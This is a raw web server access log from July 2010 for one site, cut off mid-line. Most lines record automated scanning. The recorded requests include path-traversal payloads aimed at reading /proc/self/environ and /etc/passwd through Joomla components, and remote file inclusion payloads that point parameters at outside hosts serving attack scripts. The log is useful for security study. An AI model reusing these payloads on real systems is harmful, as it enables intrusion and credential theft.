188.165.213.8 - - [28/Jul/2010:22:04:10 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:04:10 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:04:10 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:14:13 -0700] "GET /logs/access.log//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:14:13 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.165.213.8 - - [28/Jul/2010:22:14:14 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
76.13.114.105 - - [28/Jul/2010:22:18:02 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
178.63.53.120 - - [28/Jul/2010:22:26:45 -0700] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.53.120 - - [28/Jul/2010:22:26:45 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.53.120 - - [28/Jul/2010:22:26:45 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.53.120 - - [28/Jul/2010:22:28:07 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.53.120 - - [28/Jul/2010:22:28:08 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
178.63.53.120 - - [28/Jul/2010:22:28:13 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.121.192.28 - - [28/Jul/2010:22:29:21 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.121.192.28 - - [28/Jul/2010:22:29:22 -0700] "GET /logs/access.log/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.121.192.28 - - [28/Jul/2010:22:29:23 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.121.192.28 - - [28/Jul/2010:22:30:16 -0700] "GET /option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.121.192.28 - - [28/Jul/2010:22:30:17 -0700] "GET /logs/access.log%20%20/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.121.192.28 - - [28/Jul/2010:22:30:17 -0700] "GET /logs/option,com_sitemap/Itemid,73/component/option,com_sitemap/Itemid,50/component/option,com_sitemap/Itemid,53//component/option,com_sitemap/Itemid,79//components/com_sitemap/sitemap.php?mosConfig_admin_path=http://www.inflow.co.uk/Site/gallery/images/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [28/Jul/2010:22:31:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
66.163.171.206 - - [28/Jul/2010:22:37:17 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
125.176.223.185 - - [28/Jul/2010:22:40:47 -0700] "GET / HTTP/1.0" 200 763 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; zh-CN; rv:1.9.1) Gecko/20090624 Firefox/3.5 GTB5" "www.redneckmba.com"
76.13.114.106 - - [28/Jul/2010:22:44:47 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
112.140.183.193 - - [28/Jul/2010:22:48:56 -0700] "GET /auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
202.29.14.1 - - [28/Jul/2010:22:50:36 -0700] "GET /logs/access_100531.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.29.14.1 - - [28/Jul/2010:22:50:36 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
202.29.14.1 - - [28/Jul/2010:22:50:36 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.kjep.co.kr//bbs/icon/su.pdf?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
112.140.183.193 - - [28/Jul/2010:22:53:57 -0700] "GET /logs/access.log/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
112.140.183.193 - - [28/Jul/2010:22:53:58 -0700] "GET /auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
112.140.183.193 - - [28/Jul/2010:22:53:58 -0700] "GET /logs/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
114.41.28.87 - - [28/Jul/2010:22:56:30 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
112.140.183.193 - - [28/Jul/2010:22:58:49 -0700] "GET /logs/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
112.140.183.193 - - [28/Jul/2010:22:58:50 -0700] "GET /auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
112.140.183.193 - - [28/Jul/2010:23:04:07 -0700] "GET /logs/config.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
112.140.183.193 - - [28/Jul/2010:23:04:08 -0700] "GET /config.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "redneckmba.com"
76.13.114.106 - - [28/Jul/2010:23:12:34 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:23:13:18 -0700] "GET /logs/access.log%20%20/////?_SERVER[DOCUMENT_ROOT]=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
174.123.133.162 - - [28/Jul/2010:23:13:19 -0700] "GET ////?_SERVER[DOCUMENT_ROOT]=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 200 781 "-" "Mozilla/5.0" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:23:13:20 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
174.123.133.162 - - [28/Jul/2010:23:13:20 -0700] "GET /logs/////?_SERVER[DOCUMENT_ROOT]=http://www.tehuurinutrecht.nl/id1.txt?? HTTP/1.1" 200 1947 "-" "Mozilla/5.0" "www.redneckmba.com"
76.13.123.194 - - [28/Jul/2010:23:26:03 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
112.140.183.193 - - [28/Jul/2010:23:37:54 -0700] "GET /logs/access_100614.log/auth.php?xcart_dir=' HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.redneckmba.com"
76.13.114.105 - - [28/Jul/2010:23:41:05 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
88.250.57.232 - - [28/Jul/2010:23:43:20 -0700] "GET /logs/access_100728.log HTTP/1.0" 404 - "-" "Wget/1.11.4" "www.redneckmba.com"
208.43.40.176 - - [28/Jul/2010:23:43:24 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
208.43.40.176 - - [28/Jul/2010:23:43:24 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
66.163.171.207 - - [28/Jul/2010:23:50:37 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
193.47.80.50 - - [28/Jul/2010:23:52:50 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "redneckmba.com"
193.47.80.50 - - [28/Jul/2010:23:52:50 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "redneckmba.com"
208.43.40.176 - - [28/Jul/2010:23:53:08 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
208.43.40.176 - - [28/Jul/2010:23:53:08 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
208.43.40.176 - - [28/Jul/2010:23:53:15 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
208.43.40.176 - - [28/Jul/2010:23:53:15 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
76.13.114.105 - - [29/Jul/2010:00:10:18 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
93.232.210.134 - - [29/Jul/2010:00:16:13 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.232.210.134 - - [29/Jul/2010:00:16:13 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.232.210.134 - - [29/Jul/2010:00:16:13 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
93.232.210.134 - - [29/Jul/2010:00:20:44 -0700] "GET /logs/access_100614.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://razi.teo.ir/images/maghale/id1.txt????? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.redneckmba.com"
86.109.96.188 - - [29/Jul/2010:00:21:49 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
119.137.123.94 - - [29/Jul/2010:00:21:56 -0700] "GET /logs/access_100614.log HTTP/1.1" 200 93466 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
76.13.123.195 - - [29/Jul/2010:00:22:22 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
208.43.40.176 - - [29/Jul/2010:00:23:27 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
208.43.40.176 - - [29/Jul/2010:00:23:27 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
193.47.80.50 - - [29/Jul/2010:00:25:04 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.redneckmba.com"
193.47.80.50 - - [29/Jul/2010:00:25:05 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)" "www.redneckmba.com"
66.163.171.206 - - [29/Jul/2010:00:30:36 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:37:36 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:37:37 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
76.13.114.107 - - [29/Jul/2010:00:40:58 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:45:28 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:45:28 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:45:29 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:46:58 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:46:59 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:00:46:59 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
86.109.96.188 - - [29/Jul/2010:00:51:18 -0700] "GET /logs/access.log/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
86.109.96.188 - - [29/Jul/2010:00:51:18 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
86.109.96.188 - - [29/Jul/2010:00:51:18 -0700] "GET /logs/index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
66.163.171.207 - - [29/Jul/2010:01:10:57 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
76.13.114.107 - - [29/Jul/2010:01:12:04 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
119.123.245.15 - - [29/Jul/2010:01:13:08 -0700] "GET /logs/access_100712.log HTTP/1.1" 200 722261 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)" "redneckmba.com"
72.249.108.140 - - [29/Jul/2010:01:20:18 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "redneckmba.com"
72.249.108.140 - - [29/Jul/2010:01:20:19 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "redneckmba.com"
76.13.123.195 - - [29/Jul/2010:01:21:10 -0700] "GET /blog/?feed=rss2 HTTP/1.1" 404 - "-" "BuzzTracker/1.02 +http://www.buzztracker.com" "redneckmba.com"
83.143.81.22 - - [29/Jul/2010:01:23:05 -0700] "GET /logs/index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
83.143.81.22 - - [29/Jul/2010:01:23:05 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "redneckmba.com"
208.43.40.176 - - [29/Jul/2010:01:26:22 -0700] "GET /logs/?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 1939 "-" "libwww-perl/5.831" "www.redneckmba.com"
208.43.40.176 - - [29/Jul/2010:01:26:22 -0700] "GET /?option=com_ckforms&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 779 "-" "libwww-perl/5.831" "www.redneckmba.com"
83.143.81.22 - - [29/Jul/2010:01:26:29 -0700] "GET /index.php?option=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.redneckmba.com"
83.243.9.110 - - [29/Jul/2010:01:28:30 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
83.243.9.110 - - [29/Jul/2010:01:28:30 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
83.243.9.110 - - [29/Jul/2010:01:28:34 -0700] "GET /logs//index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
83.243.9.110 - - [29/Jul/2010:01:28:34 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "redneckmba.com"
95.108.150.235 - - [29/Jul/2010:01:30:33 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [29/Jul/2010:01:30:22 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [29/Jul/2010:01:30:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [29/Jul/2010:01:30:23 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
95.108.150.235 - - [29/Jul/2010:01:30:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "www.redneckmba.com"
95.108.150.235 - - [29/Jul/2010:01:30:24 -0700] "GET / HTTP/1.1" 200 779 "-" "Mozilla/5.0 (compatible; YandexBot/3.0; MirrorDetector; +http://yandex.com/bots)" "redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:30:40 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:30:41 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:17 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:17 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.165.217.175 - - [29/Jul/2010:01:31:19 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
67.210.119.155 - - [29/Jul/2010:01:31:21 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.832" "www.redneckmba.com"
91.121.141.186 - - [29/Jul/2010:01:31:22 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:23 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
91.121.141.186 - - [29/Jul/2010:01:31:26 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:27 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.165.217.175 - - [29/Jul/2010:01:31:27 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
91.121.141.186 - - [29/Jul/2010:01:31:35 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:41 -0700] "GET /logs/index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:41 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
188.127.248.175 - - [29/Jul/2010:01:31:50 -0700] "GET /index2.php?option=com_joomlapicasa2&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.808" "www.redneckmba.com"
83.243.9.110 - - [29/Jul/2010:01:31:58 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.816" "www.redneckmba.com"
83.243.9.110 - - [29/Jul/2010:01:31:58 -0700] "GET /index.php?option=com_